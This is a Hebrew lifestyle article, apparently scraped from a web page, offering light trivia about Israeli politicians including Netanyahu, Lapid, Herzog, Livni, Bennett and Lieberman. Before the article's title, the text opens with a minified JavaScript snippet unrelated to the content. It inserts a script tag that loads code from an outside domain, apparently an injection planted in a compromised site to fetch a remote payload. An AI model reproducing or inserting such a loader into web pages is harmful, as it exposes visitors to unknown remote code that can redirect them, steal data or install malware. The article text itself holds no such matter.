;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); עובדות מפתיעות על חלק מנבחרי הציבור שלנו
ירושלים

עובדות מפתיעות על חלק מנבחרי הציבור שלנו

בנימין נתניהו

קשה לנו לחשוב על ביבי עם מישהי אחרת שהיא לא שרה, נדמה שהם היו ביחד מאז ומתמיד. הרבה יותר קשה לחשוב על ביבי יושב בדייט עם מישהי כמו כרמלה מנשה, שניסו לשדך לו כשהוא היה שגריר ישראל באו"ם. שניהם היו בעניין של פגישה אבל ביבי ביטל ברגע האחרון כי הוא הספיק כבר להתחיל לצאת עם מישהי אחרת. בכל אופן, כל הכבוד לו שהוא לא מאלו שיוצאים עם שתיים במקביל עד שמשהו הופך לרציני.

אגב, אתם יודעים למה יש לביבי כזו אנגלית מצוינת? לא, לא בגלל שהוא היה שגריר באו"ם, אלא בגלל סיבה הרבה יותר מוקדמת. הוא גדל בפילדלפיה! בסוף שנות ה-50 ובמהלך שנות ה-60 משפחתו התגוררה פעמיים למשך מספר שנים בפרברים. הוא למד בתיכון אמריקאי וגם היה פעיל במועדון הדיבייט המקומי. שם הוא החל להתאמן על הנאומים הקולחים שלו.

יאיר לפיד

אל תתנו לזיכרון הקצר שלכם להשכיח מכם זיכרונות עסיסיים מעברו של לפיד. בבקשה אל. רענון קל: הוא שיחק בכל מיני סרטים כמו "שירת הסירנה", "מעבר לים" ו"כבלים", ואיזה חתיך הוא היה אז, עם הג'ל וזה. אוהו! בנוסף, הוא גם היה מתאגרף חובב.

ללפיד כידוע אין תעודת בגרות, וגם לא פסיכומטרי, אבל זה לא מנע ממנו בשנת 2011 להתקבל ללימודי דוקטורט באוניברסיטת בר אילן במסלול פרשנות ותרבות. איך בדיוק הוא התקבל? הוא עשה מספר קורסים כסטודנט חופשי והגיש מועמדות. הידיעה על כך התפרסמה בכלי התקשורת והמועצה להשכלה גבוהה הורתה לאוניברסיטה לבטל את המסלולים שמאפשרים לימודי תואר שני ושלישי ללא תואר ראשון. באסוש, אבל הוא צעיר, יש לו עוד המון שנים להשלים כל מה שצריך, אם הוא ממש ירצה בכך.

יצחק (בוז'י) הרצוג

שאלתם את עצמכם פעם למה כולם קוראים לו בוז'י? זה כינוי שהוא קיבל כבר כילד מאימא שלו. מי ידע אז שזה יהפוך להיות סמלו המסחרי.

בכל מקרה, בוז'י הקטן גדל בבית שבו נשבו רוחות ציבוריות חזקות. אבא שלו, האלוף חיים הרצוג, היה נשיאה השישי של המדינה, וסבא שלו, יצחק אייזיק הרצוג, שעל שמו הוא נקרא, היה הרב הראשי הראשון במדינה. אם זה לא מספיק, דודו הוא אבא אבן, שהיה שר חוץ מיתולוגי. אין ספק שזה היה די מאכזב אם בסוף היה יוצא ממנו סטודנט לקולנוע, נגיד, או אדריכל נוף.

ציפי לבני

כשהרוחות סוערות, לבני ככל הנראה נזכרת בערגה בימים הפרנקופיליים שלה, כשהיא גרה בפריז בשירות המוסד. היא מספרת לפעמים למקורבים שהמקומות האהובים עליה הם שדרות סן ז'רמן וכיכר הקונקורד. היא זו שכולם מתייעצים אתה לגבי האטרקציות החמות בעיר.

חוץ מזה, הזמרת האהובה עליה היא אדית פיאף. באותה נשימה, היא גם ממש אוהבת מוזיקה מזרחית. היא אפילו התוודתה פעם על טעמה המוזיקאלי בתכנית הבוקר של דנה רון (זוכרים?): "חושבים שאני צפונית אבל רקדתי על שולחנות". מסתבר שהיא נהגה לבלות להנאתה במועדונים ים תיכוניים בדרום תל אביב.

נפתלי בנט

מה שבאמת מטריד את בנט זה איך לשמור על המשקל כשיש לו אישה קונדיטורית בעוד שהוא ממש מנסה להימנע מקינוחים. מספרים שהוא כל הזמן מנסה דיאטות שקמות ונופלות. מה שבטוח, אם אשתו תכין קינוח עם קיווי, הוא לא יעז לגעת, כי הוא אלרגי לפרי החורפי הזה.

בפעם הבאה שתראו אותו מתראיין איפשהו, תזכרו שאת החליפה שהוא לובש, סביר להניח שאשתו קנתה לו. הוא וקניות זה הכי לא. שימו לב שהוא בעיקר מולבש בצבעי כחול ולבן. כמה ציוני!

אביגדור ליברמן:

ניסיתם פעם לשלוח סמס "ער" לליברמן ותהיתם למה הוא לא עונה? ובכן, יש מצב שהוא באמת ישן כבר לאחר יום ארוך. הסיבה האמיתית היא שליברמן ידוע כאדם שאינו חובב גדול של סמארטפונים וגאדג'טים, ולכן הוא אינו טורח לענות לסמסים, אבל הוא לפחות קורא אותם.

ועוד כמה דברים שכדאי לכם לדעת עליו: עד גיל שלוש ליברמן ידע לדבר רק יידיש, הוא פעם חטא בכתיבה וכתב מחזה ששמו "סטודנטים", היום הבית שלו בהתנחלות נוקדים מוערך בשווי של 1.5 מיליון שקלים, אבל בשנות ה-90 הוא קנה אותו רק ב-260 אלף שקלים. יש לו רישיון נהיגה, אבל, הוא לא מחזיק במכונית.